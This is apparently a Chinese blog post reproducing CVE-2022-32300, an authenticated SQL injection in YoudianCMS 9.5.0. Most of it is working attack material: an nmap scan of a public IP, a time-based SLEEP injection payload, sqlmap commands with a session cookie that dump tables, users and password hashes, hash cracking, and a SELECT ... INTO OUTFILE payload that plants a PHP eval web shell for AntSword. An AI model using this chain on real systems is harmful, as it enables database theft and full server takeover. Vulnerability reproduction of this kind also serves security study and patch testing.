CVE-2022-32300漏洞复现(youdiancms 9.5.0)

首先安装cms
Pasted image 20251118195942.png
Pasted image 20251118195958.png
先登录网站后台:http://<IP地址>/index.php/Admin/public/AdminIndex
进入管理后台
Pasted image 20251118200038.png
首先进行端口扫描

nmap <IP地址>
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-19 09:08 CST
Nmap scan report for 123.58.224.8
Host is up (0.012s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8008/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds

本漏洞易受攻击的文件路径:http://<IP地址>/index.php/App/Lib/Action/Admin/MailAction.php
Pasted image 20251118201437.png
易受攻击的url:http://<IP地址>/index.php/Admin/mail/viewLog?MailSendID=1

延时注入

MailSendID=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))A)

登录后台获取cookie

PHPSESSID=oj44i6rf57h48fg16agn48btdv

Pasted image 20251118200720.png

sqlmap无脑扫,由于本漏洞需要后台管理员权限,请注意带上你的cookie

python sqlmap.py -u "http://<IP地址>/index.php/Admin/mail/viewLog?MailSendID=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))A)" --cookie "PHPSESSID=oj44i6rf57h48fg16agn48btdv" --tables --level 2

选项选择N,Y,N,Y,N
Pasted image 20251118204348.png

python sqlmap.py -u "http://<IP地址>/index.php/Admin/mail/viewLog?MailSendID=1" --cookie="PHPSESSID=f3of4ssti7dsg8pvs3s8rtf9vn; youdianMenuTopID=3" --dbs

Pasted image 20251118220511.png
将之前yakit截获的(/index.php/Admin/mail/viewLog?MailSendID=1)响应包复制下来为data.txt

GET /index.php/Admin/mail/viewLog?MailSendID=1 HTTP/1.1

Host: <IP地址>

Cookie: PHPSESSID=oj44i6rf57h48fg16agn48btdv; youdianMenuTopID=3

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

首先对用户名进行爆破

python sqlmap.py -r data.txt --users --threads 10

Pasted image 20251118221507.png

接着对密码进行爆破

python sqlmap.py -r data.txt --passwords --threads 10

0435750a-c418-477b-9df0-f3a8b12ac7e0.png
得到密文密码:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
cmd5解码

Pasted image 20251118221427.png
接着就是登录mysql,传入一句话木马
构造payload

SELECT "<?php eval(@$_POST['password']);?> " INTO OUTFILE '/var/www/wordpress/include/Db/1.php';

然后蚁剑连上一句话木马即可,就不演示了

添加新评论

文章状态:已收录~
歌曲封面
0:00